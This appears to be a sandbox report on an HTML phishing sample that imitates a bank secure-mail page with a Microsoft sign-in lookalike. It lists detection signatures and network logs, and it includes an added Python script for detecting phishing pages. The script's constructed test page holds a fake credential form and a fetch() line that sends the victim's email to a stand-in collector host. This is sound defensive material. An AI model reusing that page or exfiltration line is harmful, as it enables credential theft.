Windows Analysis Report
bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html

Overview

General Information

Sample Name: bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html
Analysis ID: 626103
MD5: bb0c6e89198797992503772ef06e95c0
SHA1: 52f29b0581c4d63fc3c6716c2c2e8574741fcda0
SHA256: f7db9d3408304aac67ef83179ab40ea97992aba9f8d6c80d4363d215f3416d93

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish10
HTML document with suspicious title
Phishing site detected (based on image similarity)
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

Phishing

Source: Yara match File source: 74548.0.pages.csv, type: HTML
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Matcher: Found strong image similarity, brand: Microsoft image: 74548.0.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Matcher: Found strong image similarity, brand: Microsoft image: 12183.1.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html HTTP Parser: No <meta name="copyright".. found
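The HTTP Parser findings above are static checks on the file itself. The script below, an added example that is not part of the Joe Sandbox report, reproduces those checks (missing title, missing author/copyright meta, credential input fields) and adds two that this sample's network activity motivates: a page that loads its artwork from the genuine Microsoft sign-in CDNs (aadcdn.msftauth.net, aadcdn.msauth.net) while referencing an unrelated host, and an e-mail address embedded in the markup. The sample page, the host names in it and the scoring weights are constructed for illustration and are not the analysed file's content; the way the sample appends the address straight onto a `prv.php` path mirrors what the logged request to lootahbf.work looks like, but the kit's actual code is not on this page.

```python
"""Static phishing-page heuristics modelled on the sandbox's HTTP Parser signatures.

Added example, not part of the Joe Sandbox report. SAMPLE_HTML is a
constructed Microsoft-lookalike sign-in page, not the analysed file.
"""
import re
from html.parser import HTMLParser

# CDNs that serve Microsoft's genuine sign-in artwork (the report shows the
# page fetching its logo and background from these hosts).
BRAND_CDN_HOSTS = {"aadcdn.msftauth.net", "aadcdn.msauth.net"}
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HOST_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)
CREDENTIAL_NAME_HINTS = ("pass", "email", "user", "login")


class PageFeatures(HTMLParser):
    """Collects the handful of features the heuristics need."""

    def __init__(self):
        super().__init__()
        self.title = None          # None means no <title> element at all
        self._in_title = False
        self.meta_names = set()    # lower-cased <meta name="..."> values
        self.input_types = []
        self.input_names = []
        self.hosts = set()         # every host referenced by an absolute URL

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
            self.title = ""
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
            self.input_names.append((a.get("name") or a.get("id") or "").lower())
        for value in a.values():   # src/href/action/onclick... all scanned for URLs
            if value:
                self.hosts.update(h.lower() for h in HOST_RE.findall(value))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        # Inline <script> bodies arrive here too, so URLs built in JS are caught.
        self.hosts.update(h.lower() for h in HOST_RE.findall(data))


def analyse(html: str) -> dict:
    """Return the individual findings plus a simple additive score."""
    p = PageFeatures()
    p.feed(html)
    credential_inputs = any(t in ("password", "email") for t in p.input_types) or any(
        hint in name for name in p.input_names for hint in CREDENTIAL_NAME_HINTS)
    findings = {
        "html_title_missing": not (p.title or "").strip(),
        "no_meta_author": "author" not in p.meta_names,
        "no_meta_copyright": "copyright" not in p.meta_names,
        "has_credential_inputs": credential_inputs,
        "uses_brand_cdn": bool(p.hosts & BRAND_CDN_HOSTS),
        "non_brand_hosts": sorted(h for h in p.hosts if h not in BRAND_CDN_HOSTS),
        "email_in_markup": bool(EMAIL_RE.search(html)),
    }
    score = sum(1 for k in ("html_title_missing", "no_meta_author", "no_meta_copyright",
                            "has_credential_inputs", "email_in_markup") if findings[k])
    # Brand artwork from the real CDN plus traffic to an unrelated host is the
    # strongest single signal here, so it is weighted higher (weight is an assumption).
    if findings["uses_brand_cdn"] and findings["non_brand_hosts"]:
        score += 2
    findings["score"] = score
    return findings


# Constructed sample: no <title>, no author/copyright meta, credential inputs,
# genuine Microsoft CDN artwork, and a CORS call to an unrelated host that
# appends the address taken from the URL fragment onto the path.
SAMPLE_HTML = """<!DOCTYPE html><html><head><meta charset="utf-8">
<link rel="stylesheet" href="https://aadcdn.msftauth.net/shared/1.0/content/css/converged.css">
</head><body>
<img src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo.svg">
<form id="login" onsubmit="return false">
  <input type="email" name="loginfmt" value="victim@example.invalid">
  <input type="password" name="passwd">
  <button>Sign in</button>
</form>
<script>
  var email = location.hash.substring(1);
  fetch("https://collector.example.invalid/prv.php" + email, {mode: "cors"});
</script>
</body></html>"""

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Run against the constructed page, every check fires and the only non-brand host is the collector; a plain intranet page with a title and author/copyright meta scores zero. The signals are deliberately the cheap ones a mail gateway can compute without rendering; they complement, not replace, the image-similarity match the sandbox reports.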
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.35.236.56:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.135:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49862 version: TLS 1.2
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View IP Address: 13.107.246.60
Source: unknown DNS traffic detected: queries for: code.jquery.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.31.6
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.134
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 51.11.233.143
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220308T162912Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=178e458a29d04deda990b45f0b45a10d&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418274&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1418274&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  Cache-Control: no-cache
  MS-CV: QXjzeVAaAUmzqs0S.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220308T162912Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=2998cbfae47745338f2b0b590b71e191&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1418274&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=VMware7%2C1&tl=2&tsu=1418274&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  Cache-Control: no-cache
  MS-CV: QXjzeVAaAUmzqs0S.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18694.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.4e8e78d2-c2c2-4c02-8d8c-46ac3b2419e7?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.2052.9007199266247846.b5c49955-e050-4553-b8e4-0e223ed6c5a1.a0c3decd-308f-4f06-bcfb-2aa4f3afe248?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.16574.13571498826857201.00a9d390-581f-492c-b148-b2ce81649480.6a6f592e-efa9-4bb0-b008-7c3422ab3313?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /image/apps.18858.9007199266246227.c596c546-6fcb-4260-935c-19bc24b971ef.1b03c26f-1753-4221-9ab1-4581f098723d?format=source HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: store-images.s-microsoft.com
  Connection: Keep-Alive
